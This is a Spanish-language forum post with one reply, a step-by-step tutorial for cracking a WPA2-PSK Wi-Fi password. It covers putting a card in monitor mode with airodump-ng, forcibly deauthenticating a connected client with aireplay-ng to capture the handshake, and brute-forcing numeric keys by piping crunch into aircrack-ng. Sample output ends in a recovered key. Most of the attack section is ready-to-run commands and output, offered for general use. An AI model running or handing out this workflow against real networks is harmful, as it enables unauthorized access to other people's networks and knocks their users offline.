comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Crunch "Explicacion escrita"

  • 1 Respuestas
  • 2688 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado On3

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Diciembre 27, 2012, 02:02:51 am »
Hola, despues de probar con john the ripper, y aberme llebado un chasco bien grande al no optener la wpa2 psk,
os dejo este tuto de como utilizar crunch, que para mi, es una opcion valida.

Para quienes no lo tengais instalado en buestro linux, backtrack, wifislax... aqui para bajarlo e instalarlo , explicado :
Citar
No tienes permisos para ver links. Registrate o Entra con tu cuenta
despues de aberlo descargado ,procedemos a descomprimirlo:
tar -xvzf crunch*.tgz
Entramos al directorio
cd crunch
Lo compilamos, por si las moscas primero dejo el build-essential por si no lo teneis :
apt-get install build-essential
Aora si, lo compilamos:
make
make install
Por ultimo copiamos el comando al sbin:
cp crunch /usr/sbin/
para los que no tengais el aircrack "ai que tener instalado apt"
apt-get install aircrack-ng

sigamos,
Ponemos en modo (monitor) nuestra usb o tarjeta wifi (en mi caso la interfaz es wlan0, cada uno que ponga la suya "si no sabes cual es pones Iwconfig y listo"

escaneamos las redes, con el siguiente comando "acordarse de cambiar wlan0 por el buestro XD"

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
airodump-ng wlan0
os aparecera lo siguiente :

C
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
H  6 ][ Elapsed: 8 s ][ 2012-12-27 05:00 ]                                       
                                                                                                   
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                   
                                                                                                   
 00:27:22:LB:88:3E  -89        3        0    0   6  54e  OPN              <length:  0>             
 0W:27:22:LC:88:3E  -90        3        1    0   6  54e  WPA2 CCMP   PSK  0N3_wifi       
 0T:27:22:LC:88:3E  -89        3        3    0   6  54e  WPA2 CCMP   MGT  Wlan_5145         
 0A:26:24:86:LC:9D  -70        0        0    0  11  54e  WPA2 CCMP   PSK  Wifi_carlos
 00:11:6B:4A:3C:A0  -68        2        0    0  11  54e. WPA2 TKIP   PSK  LevelOne2         

voy a usar es el  "default" que tiene cifrado WPA TKIP PSK:
TKIP: (Temporal Key Integrity Protocol)
PSK: (Pre-Shared Key)

Una vez que tenemos el MAC del AP y el canal, ponemos:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
airodump-ng -c NUMERODELCANAL --bssid MAC-DEL-AP -w default wlan0
En este caso:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
airodump-ng -c 6 --bssid 0W:27:22:LC:88:3E -w default wlan0
Ahora airodump solo va a escuchar ese canal y ese AP (en mi caso un usb nuevo que compre hoy,y puse en modo AP )

podemos hacer lo siguiente:

1) Esperar que se conecte un nuevo cliente para adquirir el handshake
2) Des autenticar un cliente ya conectado para que vuelva a conectarse y adquirir el handshake
en este caso aremos lo segundo ya que les pedi a mis hermanos que se conectaran para poder acerlo y mostrarlo
copiamos el MAC del AP y el MAC del cliente conectado en un txt mismo para no liarnos

AP:                               0W:27:22:LC:88:3E
Cliente Conectado:        0F:0C:FW:7A:67:D3

Procedemos a desautenticar al cliente mediante este comando:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
aireplay-ng -0 10 -a MAC-DEL-AP -c MAC-DEL-CLIENTE wlan0
en mi caso seria asi:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
aireplay-ng -0 10 -a  0W:27:22:LC:88:3E -c 0F:0C:FW:7A:67:D3 wlan0
Hace algo así:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@bt: aireplay-ng -0 10 -a 0W:27:22:LC:88:3E -c 0F:0C:FW:7A:67:D3 wlan0
23:46:18 Waiting for beacon frame (BSSID:0W:27:22:LC:88:3E) on channel 6
23:46:19 Sending 64 directed DeAuth. STMAC: [0F:0C:FW:7A:67:D3] [ 1|173 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [0F:0C:FW:7A:67:D3] [14|155 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [0F:0C:FW:7A:67:D3] [ 0|207 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [0F:0C:FW:7A:67:D3] [11|173 ACKs]

Si no lo desautentifica a la primera, volver a repetir el comando.
Una vez que el usuario es desautenticado y vuelva a ingresar nos va a aparecer arriba a la derecha el handshake:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
CH 6 ][ Elapsed: 9 mins ][ 2012-12-27 05:20 ][ WPA handshake: 0W:27:22:LC:88:3E
Listo, ya tenemos el handshake, ahora utilizamos el crunch, escribimos esto:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -
En este caso: (yo movi el handshake a la carpeta "root" ustedes pongan su ruta)

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
crunch 8 9 0123456789 | aircrack-ng -a 2 /root/0N3_wifi.cap  -e default -b 0W:27:22:LC:88:3E -w
Citar
Aclaración: "crunch 8 9" hace referencia a que las claves WPA como mínimo tienen 8 caracteres, en este caso yo quiero que sólo pruebe hasta 9 caracteres, y que utilice los números 0123456789.
El 75% de los usuarios cometen el error de "asegurar" la red con WPA y usar claves numéricas, que en este caso vamos a ver lo fáciles que son de conseguir con crunch
Si quisiéramos que crunch use letras, pondríamos "crunch 8 15 (máximo 15 caracteres)" abcdefghijklmno"

Ahora vamos a ver como crunch empieza a generar claves y a probarlas con el aircrack-ng:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
crunch 8 9 0123456789 | aircrack-ng -a 2 /root/0N3_wifi.cap  -e default -b 0W:27:22:LC:88:3E -w
Opening /root/0N3_wifi.cap
Reading packets, please wait...

Aircrack-ng 1.0 rc3


[00:00:50] 72172 keys tested (1445.33 k/s)


KEY FOUND! [ 00072169 ]


Master Key : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0
32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E

Transient Key : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD
16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94
30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E
E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98

EAPOL HMAC : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D



Listo, ya tenemos la clave  que lo disfrutéis, como lo hice yo.
Saludos, 0N3.

PD:Siento las faltas de ortografía xD pero dado que son las 6 de la mañana, y voy adormilado, es lo que ai xD
Agradecería a un moderador que le pusiera una chincheta de esas y se quede en lo alto como los aportes de antrax, pues es un aporte también, "ya actualizare el post poniéndole imágenes" .

LOG DE MODERACION
Tema editado para mejorar su comprension.
cl0udswx 031120014

« Última modificación: Noviembre 03, 2014, 06:45:42 pm por CloudswX »
No sere el mejor, pero tampoco el peor, no me considero Dios, ni tampoco un Diablo, aprendere despacio, pero dicen que mejor despacio y bien, que rapido y no aprender nada :)
Felizes fiestas usuari@s de undercode y moderadores tambien =)

Desconectado d3vilz5

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Diciembre 27, 2012, 03:05:43 am »
Excelente bro este no me lo sabía  :o
gracias por traerlo y compartir  ;D

 

¿Te gustó el post? COMPARTILO!



Crunch (crea tus wordlist)

Iniciado por arthusu

Respuestas: 1
Vistas: 1739
Último mensaje Diciembre 06, 2011, 05:24:07 pm
por baron.power
El nuevo linset "FLUXION"

Iniciado por puntoCL

Respuestas: 44
Vistas: 44008
Último mensaje Diciembre 29, 2017, 06:49:38 am
por erodas24
Certificacion "Wi-Fi Security and Pentesting" Gratis.

Iniciado por Cl0udswX

Respuestas: 22
Vistas: 10433
Último mensaje Agosto 03, 2016, 01:01:53 am
por chilango_o
Diferentes métodos de "crackeo wi-fi" usados hoy día

Iniciado por CNait

Respuestas: 0
Vistas: 2623
Último mensaje Noviembre 18, 2016, 08:46:18 pm
por CNait
Airolib-ng (El "Rapido" Crackeo de WPA/WPA2)

Iniciado por KzZiIi3l

Respuestas: 7
Vistas: 5916
Último mensaje Diciembre 07, 2011, 08:43:42 pm
por KzZiIi3l